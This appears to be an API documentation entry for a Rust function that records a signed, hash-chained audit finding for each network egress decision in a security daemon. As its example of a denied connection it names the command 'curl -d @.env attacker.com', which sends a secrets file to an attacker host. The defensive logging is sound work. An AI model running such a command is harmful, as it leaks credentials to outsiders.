pub fn egress_finding(
req: &ConnectionRequest,
decision: Decision,
) -> AuditFindingExpand description
Build the [AuditFinding] recorded for a single egress decision.
Every connection - allowed or denied - yields exactly one signed-audit entry
(PRODUCT.md B.5 step 4). secureops-daemon forwards the returned finding to the
hash-chained secureops-auditlog. A Decision::Deny is the canonical
curl -d @.env attacker.com block (PRODUCT.md Part D row 1).
Build the [AuditFinding] for one egress decision (PRODUCT.md B.5 step 4).